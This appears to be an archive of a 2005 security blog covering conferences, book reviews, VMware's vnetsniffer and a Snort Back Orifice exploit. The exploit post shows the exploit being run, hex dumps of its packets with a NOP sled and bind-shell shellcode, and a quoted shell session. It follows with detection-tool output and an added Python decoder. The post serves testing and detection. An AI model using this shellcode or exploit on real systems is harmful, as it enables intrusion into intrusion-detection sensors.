Monday, October 31, 2005

Bejtlich to Speak at ShmooCon 2006

I just learned I will speak at ShmooCon 2006 in Washington, DC on Saturday, 14 January 2006 at 1600. The subject is Network Security Monitoring with Sguil.

Friday, October 28, 2005

First Hampton Roads, VA Snort Users Group Meeting

My friend David Bianco is organizing a Hampton Roads, VA Snort Users Group. The first meeting will be 1 December 2005. Check out the story for more details!

FreeBSD 6.0-RELEASE Available Soon

According to this announcement by FreeBSD release engineer Scott Long, FreeBSD 6.0-RELEASE "will likely be announced by the end of the weekend or early next week, at the latest." This is great news. I plan to upgrade all of my 5.4 systems to 6.0 when it is available. I'll post my experiences.

Thursday, October 27, 2005

New (IN)SECURE Magazine Features Bejtlich Article

The latest (IN)SECURE magazine was just published. Issue 1.4 features a 7-page article on Structured Traffic Analysis, a methodology to investigate network traces I developed for my Network Security Operations class.

It uses open source tools to perform zero-knowledge analysis of saved traffic. After reading this article, you may share the sentiments of a student in one of my recent classes who said "I’m embarrassed I ever used Ethereal to start network analysis!"

Review of VMware Workstation 5 Handbook Posted

Amazon.com just posted my four star review of VMware Workstation 5 Handbook. From the review:

"Steven S. Warren's VMware Workstation 5 Handbook (VW5H) is a great book for beginning and intermediate VMware Workstation (WS) users. It is well-written, thorough, and informative. Those who are trying to deploy WS for average home, research, or corporate purposes will find their needs met. Those looking for in-depth coverage exceeding VMware's online documentation will be disappointed. Still, I've been using VMware for almost 4 years, and I learned a few new tricks.

VMware's online documentation is excellent. Those seeking to install and operate WS will find most of their needs met reading VMware's free guides. VW5H provides context and problem-solving techniques that one may not acquire from VMware's documentation. For example, a new user may be unaware of the purpose of a product like VMware P2V Assistant. By reading Ch 15 of VW5H, the user will learn how P2V can create virtual machines out of physical systems."

VMware Workstation Vnetsniffer

Did you know VMware Workstation ships with a sniffer? I should have known about it before now. Lenny Zeltser mentioned it in his 2001 paper on reverse engineering malware. There are only 15 references to it in Google Groups, however.

Vnetsniffer is very limited with regard to reporting. Here is sample output:

C:\Program Files\VMware\VMware Workstation>vnetsniffer
usage: vnetsniffer [/e] (/p "pvnID" | VMnet?)

C:\Program Files\VMware\VMware Workstation>runas /u:administrator "vnetsniffer /e vmnet0"
Enter password for administrator:
Attempting to start "vnetsniffer /e vmnet0" as user "administrator"...

len 203 src 00:03:47:0f:1f:3c dst 00:13:10:65:2f:ab IP src 192.168.2.4
dst 208.185.174.52 TCP
len 60 src 00:13:10:65:2f:ab dst 00:03:47:0f:1f:3c ARP sender
00:13:10:65:2f:ab 192.168.2.1 target 00:00:00:00:00:00 192.168.2.4
ARP request
len 42 src 00:03:47:0f:1f:3c dst 00:13:10:65:2f:ab ARP sender
00:03:47:0f:1f:3c 192.168.2.4 target 00:13:10:65:2f:ab 192.168.2.1
ARP reply
len 203 src 00:03:47:0f:1f:3c dst 00:13:10:65:2f:ab IP src 192.168.2.4
dst 208.185.174.52 TCP
len 342 src 00:0c:29:22:b7:2d dst ff:ff:ff:ff:ff:ff IP src 0.0.0.0
dst 255.255.255.255 UDP
len 203 src 00:03:47:0f:1f:3c dst 00:13:10:65:2f:ab IP src 192.168.2.4
dst 208.185.174.52 TCP
len 342 src 00:0c:29:22:b7:2d dst ff:ff:ff:ff:ff:ff IP src 0.0.0.0
dst 255.255.255.255 UDP
len 342 src 00:0c:29:22:b7:2d dst ff:ff:ff:ff:ff:ff IP src 0.0.0.0
dst 255.255.255.255 UDP
len 203 src 00:03:47:0f:1f:3c dst 00:13:10:65:2f:ab IP src 192.168.2.4
dst 208.185.174.52 TCP
len 435 src 00:13:10:65:2f:ab dst 00:03:47:0f:1f:3c IP src 208.185.174.52
dst 192.168.2.4 TCP

This output doesn't even show TCP or UDP ports, which would be very helpful. Vnetsniffer seems best suited for basic troubleshooting of virtual switches, thanks to the ability to specify a vmnet to monitor. Here I chose vmnet0, which is the default bridged interface. vmnet1 is used for host-only networking, and vmnet8 is used for NAT.

Wednesday, October 26, 2005

Bejtlich Books in HNS Contest

Mirko Zorz from Help Net Security notified me that two of my books are up for grabs in the HNS 7th Anniversary Book Contest. You could win Real Digital Forensics or Extrusion Detection: Security Monitoring for Internal Intrusions. The winners will be announced on Monday, 5 December 2005. Good luck!

Tuesday, October 25, 2005

Snort BO Exploit Published

As I expected, FrSIRT published an exploit for the Snort Back Orifice vulnerability discovered last week. I was able to compile and execute this code by RD of THC.org on FreeBSD 5.4.

orr:/home/richard$ ./THCsnortbo 66.93.110.10 1
Snort BackOrifice PING exploit (version 0.3)
by rd@thc.org

Selected target:
1 | manual testing gcc with -O0

Sending exploit to 66.93.110.10
Done.
orr:/home/richard$ ./THCsnortbo 66.93.110.10 2
Snort BackOrifice PING exploit (version 0.3)
by rd@thc.org

Selected target:
2 | manual testing gcc with -O2

Sending exploit to 66.93.110.10
Done.

Here is what the traffic looks like:

09:30:36.134739 IP 192.168.2.5.56292 > 66.93.110.10.53: 52835 updateD ServFail [5863q][|domain]
0x0000: 4500 0594 0bdb 0000 4011 f669 c0a8 0205 E.......@..i....
0x0010: 425d 6e0a dbe4 0035 0580 9592 ce63 d1d2 B]n....5.....c..
0x0020: 16e7 13cf d45a 5a79 4d8a b466 aaa2 c875 .....ZZyM..f...u
0x0030: 2309 78b2 e0d4 ef49 8a8e 39e5 aa8a 4d0d #.x....I..9...M.
0x0040: 22b5 3751 6ec9 9763 29e3 8469 f317 7430 ".7Qn..c)..i..t0
0x0050: f162 20c3 d501 a47b c0a0 c559 a5d5 96b2 .b.....{...Y....
0x0060: b04f fc0b 6749 d086 70c3 e65b 93f2 8c0a .O..gI..p..[....
0x0070: 0197 140f 95ce 3598 3a88 2fb3 cdbb ae2b ......5.:./....+
0x0080: 0458 7135 0f1e 8b06 be6d 2aa8 84bd 56ec .Xq5.....m*...V.
0x0090: da50 3ca1 a785 0b46 be2e bf3c a9a5 dd80 .P<....F...<....
0x00a0: 855a de98 ed70 cf8c 3cc9 b7f7 8ddf 3b7d .Z...p..<.....;}
0x00b0: 0595 ffbf f38d 4e6d 769b 7c1c c159 6a58 ......Nmv.|..YjX
0x00c0: 3b5c 6a7b 8aa8 43df f0c0 9710 36a0 0306 ;\j{..C.....6...
0x00d0: e92e 8752 824e a6b6 4a75 d07a bdc1 9e1c ...R.N..Ju.z....
0x00e0: ce27 bee7 6c6c d148 c458 303d a7a8 d68e .'..ll.H.X0=....
0x00f0: 6e43 7a81 5a50 fb69 81a6 e17e c6a3 c293 nCz.ZP.i...~....
0x0100: a7e1 a244 3d06 ffce 003a ac84 c95f 1bbf ...D=....:..._..
0x0110: bcbc a1d5 86bb d48d 0374 5852 c349 1b46 .........tXR.I.F
0x0120: ad73 deb9 25fc b51a 8a4f b14d 03cd bbfe .s..%....O.M....
0x0130: 9c22 a315 eb17 1bab f848 1d1b 3c39 143c .".......H..<9.<
0x0140: e965 5a0e 0a78 bd94 6cde 07a1 feda 7f15 .eZ..x..l.......
0x0150: 35db aa6a 13ac 966a 096b 98e4 7a9d 94be 5..j...j.k..z...
0x0160: 6100 7dcd 76e0 dee3 ae4e 78a8 e16e 0c8c a.}.v....Nx..n..
0x0170: 6f70 1c5b 2522 ee93 bca4 1132 04fc 4294 op.[%".....2..B.
0x0180: 3f0a 901b b0fe dfef 76e9 ca89 b472 6d4a ?.......v....rmJ
0x0190: b3ca e2b1 09c1 2a6d bcfa afd0 a2bd 2745 ......*m......'E
0x01a0: 2b6d dbc3 41d9 6941 6e96 a76d 9fcc 49f8 +m..A.iAn..m..I.
0x01b0: 880f a4b4 2812 1401 0e17 1be4 dc2a ebd9 ....(........*..
0x01c0: 8b0f 864b 10f9 8481 1dfc 559b 2b45 67fd ...K......U.+Eg.
0x01d0: 7609 8a6b 093b 32f7 1ce2 3df6 fbea 7699 v..k.;2...=...v.
0x01e0: 49fa 39db 25a6 f877 0c05 ddfc 3f26 b002 I.9.%..w....?&..
0x01f0: 06be fc5f 55a6 4db6 6d83 7dd0 8645 2f2d ..._U.M.m.}..E/-
0x0200: 6dd4 db5c 6988 2c69 a2f8 86d7 e3f5 8cef m..\i.,i........
0x0210: bfd8 e157 5219 6de6 6ac2 02b7 46a3 409d ...WR.m.j...F.@.
0x0220: 1d87 d616 42e7 4962 c75d fa55 00dc 234b ....B.Ib.].U..#K
0x0230: 295e e29c 8a9e 5a91 1a87 76d5 a26c 4f0f )^....Z...v..lO.
0x0240: 035a 7030 5b2b 18e8 833c 1f9e 1d41 3ddf .Zp0[+...<...A=.
0x0250: ad38 2755 c4bb 9cfc 25da bf52 2208 258e .8'U....%..R".%.
0x0260: 86d5 f2d2 f9dc 1fa3 ff7d 5ed9 62ce 4112 .........}^.b.A.
0x0270: 512e 188b 69da 1af2 1343 2656 4ee0 8aa0 Q...i....C&VN...
0x0280: 8fe0 8406 a602 265d e2e9 ff0e d8ca 788d ......&]......x.
0x0290: c068 bda6 0042 9d19 6d0a 53e8 af7a 46ed .h...B..m.S..zF.
0x02a0: 25a3 ad51 2966 577b b5a6 2aa6 85bd 2a57 %..Q)fW{..*...*W
0x02b0: 7fae 7dad 31bb cd19 ba18 0e90 ccff 203e ..}.1..........>
0x02c0: 70e6 b67e ea4e 18a8 1e9d 67a9 74ae 9fb9 p..~.N....g.t...
0x02d0: 38e8 82c9 252c d29b 8313 1e17 2df8 e1fb 8...%,......-...
0x02e0: 38b1 88d3 9223 53c9 2776 fd5f aa67 3f7a 8....#S.'v._.g?z
0x02f0: 121e 7221 c37f 1427 2ee4 4ca5 7bab 71cb ..r!...'..L.{.q.
0x0300: 868c c978 484e ae69 383a f58e 312f f223 ...xHN.i8:..1/.#
0x0310: 16f8 36fe 93bb 7aa4 a5d4 41a1 fdc2 58b7 ..6...z...A...X.
0x0320: a1df a196 1455 522e f8af b7c1 306e 7fbc .....UR.....0n..
0x0330: 2a7e 3527 dd49 adbb 1049 2334 5b83 7ee7 *~5'.I...I#4[.~.
0x0340: 9232 7a55 1f42 86c0 6e1f 6b1e 508d 8f6c .2zU.B..n.k.P..l
0x0350: b899 b925 2acf d5d3 358d 5a25 1e78 8b61 ...%*...5.Z%.x.a
0x0360: 1f6e 5bdc 10fc 94c8 e511 b96d 1712 2a5c .n[........m..*
0x0370: 480f e81f 41b6 5ab5 3e67 f01d ada8 86d0 H...A.Z.>g......
0x0380: 72d9 8b54 4f6a c2ee 426c 6858 ef06 18d3 r..TOj..BlhX....
0x0390: 4009 4bfe 8a06 04e8 32de 2bc3 f0fa 389a @.K.....2.+...8.
0x03a0: 93fd b3c4 a576 59f9 8f7a 2284 a051 c09a .....vY..z"..Q..
0x03b0: 8a70 0aea 8e87 fa75 1a9c b4a0 1078 0968 .p.....u.....x.h
0x03c0: 68c0 bbb5 9807 a152 f4a2 0d9c b1fc 4c58 h......R......LX
0x03d0: 2ecb 6d4a f482 8684 fd88 73dc b489 2121 ..mJ......s...!!
0x03e0: 5b4c eacf 73e5 c2a0 372c 9145 4a6d 62b6 [L..s...7,.EJmb.
0x03f0: 5261 dc27 e57d ce3c c3ca d05e 44f5 274e Ra.'.}.<...^D.'N
0x0400: 1467 cab9 db78 63cc 62e0 b80a 734e cb5c .g...xc.b...sN.
0x0410: a01c 5ea8 4782 9bc6 d52a 134e 88a4 e5b6 ..^.G....*.N....
0x0420: b91b 813b 5ac8 4e7d dca6 c911 55e5 4ff1 ...;Z.N}....U.O.
0x0430: 9f83 5c16 8477 7529 d9b0 6336 e9aa 8210 ..\..wu)..c6....
0x0440: d5ef 789e 77bd 491c 2e92 e890 16bc d51e ..x.w.I.........
0x0450: f8fd 1e58 2446 23ee fa37 8841 3e90 9090 ...X$F#..7.A>...
0x0460: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0470: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0480: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0490: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04a0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04b0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04c0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04d0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04e0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04f0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0500: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0510: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0520: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0530: 9090 9090 9090 9090 9090 9090 9090 31db ..............1.
0x0540: 5343 536a 026a 6658 9989 e1cd 8096 4352 SCSj.jfX......CR
0x0550: 6668 7a69 6653 89e1 6a66 5850 5156 89e1 fhzifS..jfXPQV..
0x0560: cd80 b066 d1e3 cd80 5252 5643 89e1 b066 ...f....RRVC...f
0x0570: cd80 936a 0259 b03f cd80 4979 f9b0 0b52 ...j.Y.?..Iy...R
0x0580: 682f 2f73 6868 2f62 696e 89e3 5253 89e1 h//shh/bin..RS..
0x0590: cd80 0000 ....
09:30:49.654205 IP 192.168.2.5.55465 > 66.93.110.10.53: 52835 updateD ServFail [5863q][|domain]
0x0000: 4500 0594 0be4 0000 4011 f660 c0a8 0205 E.......@..`....
0x0010: 425d 6e0a d8a9 0035 0580 8ec2 ce63 d1d2 B]n....5.....c..
0x0020: 16e7 13cf 1fa1 a586 4d8a b466 aaa2 c875 ........M..f...u
0x0030: 2309 78b2 e0d4 ef49 8a8e 39e5 aa8a 4d0d #.x....I..9...M.
0x0040: 22b5 3751 6ec9 9763 29e3 8469 f317 7430 ".7Qn..c)..i..t0
0x0050: f162 20c3 d501 a47b c0a0 c559 a5d5 96b2 .b.....{...Y....
0x0060: b04f fc0b 6749 d086 70c3 e65b 93f2 8c0a .O..gI..p..[....
0x0070: 0197 140f 95ce 3598 3a88 2fb3 cdbb ae2b ......5.:./....+
0x0080: 0458 7135 0f1e 8b06 be6d 2aa8 84bd 56ec .Xq5.....m*...V.
0x0090: da50 3ca1 a785 0b46 be2e bf3c a9a5 dd80 .P<....F...<....
0x00a0: 855a de98 ed70 cf8c 3cc9 b7f7 8ddf 3b7d .Z...p..<.....;}
0x00b0: 0595 ffbf f38d 4e6d 769b 7c1c c159 6a58 ......Nmv.|..YjX
0x00c0: 3b5c 6a7b 8aa8 43df f0c0 9710 36a0 0306 ;\j{..C.....6...
0x00d0: e92e 8752 824e a6b6 4a75 d07a bdc1 9e1c ...R.N..Ju.z....
0x00e0: ce27 bee7 6c6c d148 c458 303d a7a8 d68e .'..ll.H.X0=....
0x00f0: 6e43 7a81 5a50 fb69 81a6 e17e c6a3 c293 nCz.ZP.i...~....
0x0100: a7e1 a244 3d06 ffce 003a ac84 c95f 1bbf ...D=....:..._..
0x0110: bcbc a1d5 86bb d48d 0374 5852 c349 1b46 .........tXR.I.F
0x0120: ad73 deb9 25fc b51a 8a4f b14d 03cd bbfe .s..%....O.M....
0x0130: 9c22 a315 eb17 1bab f848 1d1b 3c39 143c .".......H..<9.<
0x0140: e965 5a0e 0a78 bd94 6cde 07a1 feda 7f15 .eZ..x..l.......
0x0150: 35db aa6a 13ac 966a 096b 98e4 7a9d 94be 5..j...j.k..z...
0x0160: 6100 7dcd 76e0 dee3 ae4e 78a8 e16e 0c8c a.}.v....Nx..n..
0x0170: 6f70 1c5b 2522 ee93 bca4 1132 04fc 4294 op.[%".....2..B.
0x0180: 3f0a 901b b0fe dfef 76e9 ca89 b472 6d4a ?.......v....rmJ
0x0190: b3ca e2b1 09c1 2a6d bcfa afd0 a2bd 2745 ......*m......'E
0x01a0: 2b6d dbc3 41d9 6941 6e96 a76d 9fcc 49f8 +m..A.iAn..m..I.
0x01b0: 880f a4b4 2812 1401 0e17 1be4 dc2a ebd9 ....(........*..
0x01c0: 8b0f 864b 10f9 8481 1dfc 559b 2b45 67fd ...K......U.+Eg.
0x01d0: 7609 8a6b 093b 32f7 1ce2 3df6 fbea 7699 v..k.;2...=...v.
0x01e0: 49fa 39db 25a6 f877 0c05 ddfc 3f26 b002 I.9.%..w....?&..
0x01f0: 06be fc5f 55a6 4db6 6d83 7dd0 8645 2f2d ..._U.M.m.}..E/-
0x0200: 6dd4 db5c 6988 2c69 a2f8 86d7 e3f5 8cef m..\i.,i........
0x0210: bfd8 e157 5219 6de6 6ac2 02b7 46a3 409d ...WR.m.j...F.@.
0x0220: 1d87 d616 42e7 4962 c75d fa55 00dc 234b ....B.Ib.].U..#K
0x0230: 295e e29c 8a9e 5a91 1a87 76d5 a26c 4f0f )^....Z...v..lO.
0x0240: 035a 7030 5b2b 18e8 833c 1f9e 1d41 3ddf .Zp0[+...<...A=.
0x0250: ad38 2755 c4bb 9cfc 25da bf52 2208 258e .8'U....%..R".%.
0x0260: 86d5 f2d2 f9dc 1fa3 ff7d 5ed9 62ce 4112 .........}^.b.A.
0x0270: 512e 188b 69da 1af2 1343 2656 4ee0 8aa0 Q...i....C&VN...
0x0280: 8fe0 8406 a602 265d e2e9 ff0e d8ca 788d ......&]......x.
0x0290: c068 bda6 0042 9d19 6d0a 53e8 af7a 46ed .h...B..m.S..zF.
0x02a0: 25a3 ad51 2966 577b b5a6 2aa6 85bd 2a57 %..Q)fW{..*...*W
0x02b0: 7fae 7dad 31bb cd19 ba18 0e90 ccff 203e ..}.1..........>
0x02c0: 70e6 b67e ea4e 18a8 1e9d 67a9 74ae 9fb9 p..~.N....g.t...
0x02d0: 38e8 82c9 252c d29b 8313 1e17 2df8 e1fb 8...%,......-...
0x02e0: 38b1 88d3 9223 53c9 2776 fd5f aa67 3f7a 8....#S.'v._.g?z
0x02f0: 121e 7221 c37f 1427 2ee4 4ca5 7bab 71cb ..r!...'..L.{.q.
0x0300: 868c c978 484e ae69 383a f58e 312f f223 ...xHN.i8:..1/.#
0x0310: 16f8 36fe 93bb 7aa4 a5d4 41a1 fdc2 58b7 ..6...z...A...X.
0x0320: a1df a196 1455 522e f8af b7c1 306e 7fbc .....UR.....0n..
0x0330: 2a7e 3527 dd49 adbb 1049 2334 5b83 7ee7 *~5'.I...I#4[.~.
0x0340: 9232 7a55 1f42 86c0 6e1f 6b1e 508d 8f6c .2zU.B..n.k.P..l
0x0350: b899 b925 2acf d5d3 358d 5a25 1e78 8b61 ...%*...5.Z%.x.a
0x0360: 1f6e 5bdc 10fc 94c8 e511 b96d 1712 2a5c .n[........m..*
0x0370: 480f e81f 41b6 5ab5 3e67 f01d ada8 86d0 H...A.Z.>g......
0x0380: 72d9 8b54 4f6a c2ee 426c 6858 ef06 18d3 r..TOj..BlhX....
0x0390: 4009 4bfe 8a06 04e8 32de 2bc3 f0fa 389a @.K.....2.+...8.
0x03a0: 93fd b3c4 a576 59f9 8f7a 2284 a051 c09a .....vY..z"..Q..
0x03b0: 8a70 0aea 8e87 fa75 1a9c b4a0 1078 0968 .p.....u.....x.h
0x03c0: 68c0 bbb5 9807 a152 f4a2 0d9c b1fc 4c58 h......R......LX
0x03d0: 2ecb 6d4a f482 8684 fd88 73dc b489 2121 ..mJ......s...!!
0x03e0: 5b4c eacf 73e5 c2a0 372c 9145 4a6d 62b6 [L..s...7,.EJmb.
0x03f0: 5261 dc27 e57d ce3c c3ca d05e 44f5 274e Ra.'.}.<...^D.'N
0x0400: 1467 cab9 db78 63cc 62e0 b80a 734e cb5c .g...xc.b...sN.
0x0410: a01c 5ea8 4782 9bc6 d52a 134e 88a4 e5b6 ..^.G....*.N....
0x0420: b91b 813b 5a1c edcf 5da6 c911 55e5 4ff1 ...;Z...]...U.O.
0x0430: 9f77 ffa4 0577 7529 d9b0 6336 e97e 21a2 .w...wu)..c6.~!.
0x0440: 54ef 789e 77bd 491c 2ef1 71b6 0f90 9090 T.x.w.I...q.....
0x0450: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0460: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0470: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0480: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0490: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04a0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04b0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04c0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04d0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04e0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04f0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0500: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0510: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0520: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0530: 9090 9090 9090 9090 9090 9090 9090 31db ..............1.
0x0540: 5343 536a 026a 6658 9989 e1cd 8096 4352 SCSj.jfX......CR
0x0550: 6668 7a69 6653 89e1 6a66 5850 5156 89e1 fhzifS..jfXPQV..
0x0560: cd80 b066 d1e3 cd80 5252 5643 89e1 b066 ...f....RRVC...f
0x0570: cd80 936a 0259 b03f cd80 4979 f9b0 0b52 ...j.Y.?..Iy...R
0x0580: 682f 2f73 6868 2f62 696e 89e3 5253 89e1 h//shh/bin..RS..
0x0590: cd80 0000 ....

I ran this traffic by a local sensor running Snort 2.3.3 on FreeBSD 5.4 and it continued to function. There was no DoS or exploit. RD's exploit as written targets Linux. His demo exploits a 2.6 kernel:

* $ ./snortbo 192.168.0.101 1
* Snort BackOrifice PING exploit (version 0.3)
* by rd@thc.org
*
* Selected target:
* 1 | manual testing gcc with -O0
*
* Sending exploit to 192.168.0.101
* Done.
*
* $ nc 192.168.0.101 31337
* id
* uid=104(snort) gid=409(snort) groups=409(snort)
* uname -sr
* Linux 2.6.11-hardened-r1

Kyle Haugsness wrote a tool and rules to detect the Snort BO exploit which you might find useful. By following the directions in the code I got it to work on FreeBSD 5.4:

orr:/home/richard$ gcc -Wall -lpcap -o ident-snort-bo-exploit ident-snort-bo-exploit.c
orr:/home/richard$ sudo ./ident-snort-bo-exploit
# Using interface: fxp0
# Using alert output file: stdout
# Using pcap output file: snort-bo-exploit-2005-10-25-09:46:54.cap
#
##############################################
#
# Detected exploit attempt! (details below)
# Note that shellcode should start after 9th
# byte into the payload below (the 8 byte
# magic value has been removed and the
# remainder of the header is 9 bytes).
#
##############################################
#
# Date/time: Tue Oct 25 09:47:21 2005
# Source IP: 192.168.2.5
# Dest IP: 66.93.110.10
# Source port: 64544
# Dest port: 53
# UDP data len: 1400
# BO key (dec): 31337
# BO key (hex): 0x7A69
# BO data len: -18 (UDP len - 17 byte BO header)
# BO pkt id: -1
# BO pkt type: 0x01 (0x01 = PING)
#
# Decrypted BO data:
#
0x0000: FF FF FF FF FF FF FF FF 01 90 90 90 90 90 90 90 ................
0x0010: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0x0020: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
...edited...
0x0550: 3D AA E7 D7 80 CA 0F 07 36 14 2A 0C 65 08 05 8C =.......6.*.e...
0x0560: EE 97 25 0C 0F 90 66 06 2B 5B E2 3C CE E9 14 4B ..%...f.+[.<...K
0x0570: 00 00 00 00 00 00 00 00 ........
#
# Decoded packet num: 1; Exploit: yes; Timestamp: Tue Oct 25 09:47:21 2005
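
Here is an added example, not from the original post and not code from THC or from Kyle's tool, that does on the first exploit packet what Snort's BO preprocessor and the detection tool above do: it parses the IP and UDP headers, tries every 16-bit Back Orifice key until one turns the first 8 payload bytes into the BO magic cookie, and then decrypts the 17-byte header (8-byte magic, 4-byte length, 4-byte id, 1-byte type, as the tool output states). BO's "encryption" is the Microsoft C runtime rand() generator seeded with the key, with each payload byte XORed against the low byte of one rand() output. The packet bytes are the first 64 bytes of the trace above; reading the header integers as little-endian is an assumption of this example.

```python
import struct

BO_MAGIC = b"*!*QWTY?"   # 8-byte Back Orifice cookie that starts every BO packet
BO_HEADER_LEN = 17       # magic(8) + length(4) + id(4) + type(1), per the tool output above
BO_TYPE_PING = 0x01

# Constructed sample input: the first 64 bytes of the first exploit packet in the
# tcpdump output above (IPv4 header, UDP header, start of the BO payload).  The
# real packet is 1428 bytes; this prefix is enough to recover the key.
PACKET_PREFIX = bytes.fromhex(
    "450005940bdb00004011f669c0a80205"
    "425d6e0adbe4003505809592ce63d1d2"
    "16e713cfd45a5a794d8ab466aaa2c875"
    "230978b2e0d4ef498a8e39e5aa8a4d0d"
)


def udp_ports_and_payload(ip_packet):
    """Parse the IPv4 and UDP headers; return (src_port, dst_port, udp_payload)."""
    if ip_packet[0] >> 4 != 4 or ip_packet[9] != 17:
        raise ValueError("not an IPv4/UDP packet")
    ihl = (ip_packet[0] & 0x0F) * 4
    sport, dport = struct.unpack("!HH", ip_packet[ihl:ihl + 4])
    return sport, dport, ip_packet[ihl + 8:]


def bo_keystream(key):
    """Yield BO keystream bytes for a 16-bit key.

    BO seeds the MSVC rand() linear congruential generator with the key and
    XORs each payload byte with the low byte of the next rand() value.  The
    state is kept to 32 bits, which gives the same bytes as Snort's BoRand().
    """
    state = key & 0xFFFFFFFF
    while True:
        state = (state * 214013 + 2531011) & 0xFFFFFFFF
        yield (state >> 16) & 0xFF   # rand() is (state >> 16) & 0x7fff; keep its low byte


def bo_decrypt(key, data):
    return bytes(c ^ k for c, k in zip(data, bo_keystream(key)))


def find_bo_keys(payload):
    """Try every 16-bit key; keep those whose keystream turns the first 8 bytes into the magic.

    Snort's preprocessor precomputes this same test as a lookup table so it can
    run it against every UDP packet; here it is a plain brute force.
    """
    if len(payload) < len(BO_MAGIC):
        return []
    needed = bytes(c ^ m for c, m in zip(payload, BO_MAGIC))   # required keystream prefix
    hits = []
    for key in range(0x10000):
        stream = bo_keystream(key)
        if all(next(stream) == want for want in needed):        # stops at the first mismatch
            hits.append(key)
    return hits


def parse_bo_header(key, payload):
    """Decrypt the 17-byte BO header.  Little-endian integers are an assumption here."""
    if len(payload) < BO_HEADER_LEN:
        raise ValueError("payload shorter than a BO header")
    hdr = bo_decrypt(key, payload[:BO_HEADER_LEN])
    length, pkt_id, ptype = struct.unpack("<IIB", hdr[8:BO_HEADER_LEN])
    return {"magic_ok": hdr[:8] == BO_MAGIC, "length": length, "id": pkt_id,
            "type": ptype, "is_ping": ptype == BO_TYPE_PING}


def analyze(ip_packet):
    """Identify BO framing in a UDP packet by its payload, whatever port it uses."""
    sport, dport, payload = udp_ports_and_payload(ip_packet)
    keys = find_bo_keys(payload)
    result = {"src_port": sport, "dst_port": dport, "keys": keys}
    if keys and len(payload) >= BO_HEADER_LEN:
        result["header"] = parse_bo_header(keys[0], payload)
    return result


if __name__ == "__main__":
    r = analyze(PACKET_PREFIX)
    print("UDP %d -> %d, BO keys found: %s" % (r["src_port"], r["dst_port"], r["keys"]))
    if "header" in r:
        print("decrypted header:", r["header"])
```

Run it and the only key that produces the magic is 31337 (0x7A69), the value the tool reported. Two points worth noting: the exploit sends to UDP port 53, which is why tcpdump above decodes the packet as a broken DNS update ("updateD ServFail"), so a detector has to key on the payload, as this does, rather than on the port; and a matching cookie only proves BO framing, not an exploit attempt, so the length and payload checks the tool performs still have to follow.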

On a related note, I saw Tom Ptacek comment on my earlier post. Tom says:

"There is nothing wrong with looking for vulnerabilities in your competitor's products, and Neel Mehta has built enough of a rep for himself that he doesn't need to take 'marching orders' from anybody."

I agree there is nothing wrong with looking for vulnerabilities in your competitor's products. However, are we supposed to believe that Neel Mehta, an ISS X-Force researcher, developed this exploit on his own? Are we supposed to think he did not do this at the direction of his employer, who published an advisory? If Neel discovered this vulnerability on his own, and not while working for ISS, why did Sourcefire learn of the vulnerability from US-CERT and not Neel himself?

Monday, October 24, 2005

Reviews of Computer Security: 20 Things Every Employee Should Know, 2nd Ed and The Symantec Guide to Home Internet Security Posted

The drought has ended. Amazon.com just posted my two newest reviews. First was Computer Security 20 Things Every Employee Should Know, 2nd Ed by Ben Rothke. I gave it three stars, but I would give the next edition higher ratings if Ben addresses my suggestions. From the review:

Ben Rothke's Computer Security: 20 Things Every Employee Should Know, 2nd Ed, contains a great deal of sound advice for nontechnical employees. At least 10 tips could be eliminated by combining redundancies. I would reduce the list to the following topics:

(1) Beware malware, spyware, and phishing; (2) Protect your identity; (3) Protect the organization's data; (4) Choose sound passwords and protect them; (5) Use organization resources for authorized purposes; (6) Beware of social engineers; (7) Call the experts when things go wrong; (8) Protect laptops, PDAs, cell phones, and other mobile devices as you would corporate resources.

I also reviewed The Symantec Guide to Home Internet Security by Andrew Conry-Murray and Vincent Weafer. I gave this book four stars. From the review:

The Symantec Guide to Home Internet Security (TSGTHIS) is Symantec's latest offering in its new series of books published through Addison-Wesley. This is a very solid introductory desktop security book for home power users. This is not the book to give to your grandmother, unless she likes to tweak Windows or wants to understand differences between file infector and polymorphic viruses. With one caveat, I liked this book...

The book suffers one major flaw that robbed a star from my rating. The single most important defensive measure a home user can take is to not perform daily operations as a user with administrative privileges. Home users should not browse the Web, read email, chat in IM, write documents, or do much of anything else using an admin account. Users should only assume admin level power when they need to install software or authorized Active X controls. This single defensive measure is not mentioned by TSGTHIS, but it has protected numerous customers and my family from thousands of client-side attacks.

More on Engineering Disasters and Bird Flu

Here's another anecdote from the Engineering Disasters story I wrote about recently. In 1956 the cruise ship Andrea Doria was struck and sunk by the ocean liner Stockholm. At that time radar was still a fairly new innovation on sea vessels. Ship bridges were dimly lit, and the controls on radar systems were not illuminated. It is possible that the Stockholm radar operators misinterpreted the readings on their equipment, believing the Andrea Doria was 12 miles away when it was really 2 miles away. The ships literally turned towards one another on a collision course, based on faulty interpretation of radar contact in the dense fog. Catastrophe ensued.

